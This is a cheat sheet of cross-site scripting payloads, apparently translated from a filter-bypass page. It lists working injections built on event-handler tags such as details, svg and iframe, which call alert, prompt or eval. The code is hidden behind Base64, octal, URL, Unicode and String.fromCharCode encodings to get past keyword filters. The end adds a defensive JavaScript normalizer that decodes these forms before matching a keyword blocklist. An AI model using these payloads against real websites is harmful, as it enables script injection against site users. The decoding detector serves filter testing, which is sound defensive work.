Usable payloads:
<video src=1 onerror=alert(/xss/)> (bypass)
<audio src=x onerror=alert(/xss/)>
<body/onfocus=alert(/xss/)>
<details open ontoggle=alert(/xss/)>
<button onfocus=alert(/xss/)autofocus>
<details open ontoggle=top.alert(1)> // Note: works in Google Chrome
<details open ontoggle=top['prompt'](1)>
<details open ontoggle=top['al'%2b'ert'](1)> %2b is the URL-encoded +
%27"><details%20open%20ontoggle=eval(%27alert(1)%27)>
Use concat to assemble the string javascript:alert(1) // does not work
<iframe onload=location='javascri'.concat('pt:aler','t(1)')>
ASCII encoding of <script>alert(1)</script>:
<body/onload=document.write(String.fromCharCode(60,115,99,114,105,112,116,62,97,108,101,114,116,40,49,41,60,47,115,99,114,105,112,116,62)) >
<svg/onload=setTimeout(String.fromCharCode(97,108,101,114,116,40,49,41))>
Others:
Base64 encoding:
<details open ontoggle=eval(atob('YWxlcnQoMSk=')) >
If eval is blocked, try Unicode-encoding the e:
<details open ontoggle=\u0065val(atob('YWxlcnQoMSk=')) >
URL encoding:
<details open ontoggle=%65%76%61%6c(atob('YWxlcnQoMSk=')) >
URL encoding:
<details open ontoggle=eval('%61%6c%65%72%74%28%31%29') >
JS octal (base-8) encoding:
<details open ontoggle=eval('\141\154\145\162\164\50\61\51') >
ASCII code bypass:
<details open ontoggle=eval(String.fromCharCode(97,108,101,114,116,40,49,41)) >
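On the detection side, a keyword rule only works if it runs on the decoded form of the input. The following is an added example, not code from the original page: it unwraps the encodings listed above (URL, \u, octal, String.fromCharCode, atob, string concatenation) before matching. The function names and the keyword list are assumptions.

```javascript
// Added example, not from the original page; function names and the keyword list are assumptions.
const fromCodes = (list) => String.fromCharCode(...list.split(',').map(Number));

function decodeBase64(b64) {
  try {
    return typeof atob === 'function' ? atob(b64) : Buffer.from(b64, 'base64').toString('latin1');
  } catch (e) {
    return null; // not valid Base64: leave the call untouched
  }
}

// Unwrap the encodings from the list above until the string stops changing,
// so nested or double-encoded input is decoded as well.
function normalize(input) {
  let s = input, prev;
  do {
    prev = s;
    s = s
      .replace(/%([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)))   // URL: %65 -> e
      .replace(/\\u([0-9a-f]{4})/gi, (_, h) => String.fromCharCode(parseInt(h, 16))) // \u0065 -> e
      .replace(/\\([0-7]{1,3})/g, (_, o) => String.fromCharCode(parseInt(o, 8)))     // octal: \141 -> a
      .replace(/String\.fromCharCode\(([\d,\s]+)\)/g, (_, l) => `'${fromCodes(l)}'`)
      .replace(/atob\(\s*['"]([A-Za-z0-9+/=]+)['"]\s*\)/g, (m, b) => {
        const d = decodeBase64(b);
        return d === null ? m : `'${d}'`;
      })
      .replace(/['"]\s*\+\s*['"]/g, '');                                             // 'al'+'ert' -> 'alert'
  } while (s !== prev);
  return s;
}

const KEYWORDS = /\b(alert|prompt|confirm|eval)\b/i; // sample blocklist (assumption)

// Compare a keyword match on the raw input with a match on the normalized input.
function check(input) {
  const normalized = normalize(input);
  return { raw: KEYWORDS.test(input), decoded: KEYWORDS.test(normalized), normalized };
}

// Constructed samples: entries from the list above, written with ASCII quotes.
const samples = [
  String.raw`<details open ontoggle=top['al'%2b'ert'](1)>`,
  String.raw`<details open ontoggle=\u0065val(atob('YWxlcnQoMSk='))>`,
  String.raw`<details open ontoggle=eval('\141\154\145\162\164\50\61\51')>`,
  String.raw`<svg/onload=setTimeout(String.fromCharCode(97,108,101,114,116,40,49,41))>`,
];
for (const s of samples) console.log(check(s));
```

Entries where raw is false and decoded is true are the ones a filter matching only the undecoded string would miss.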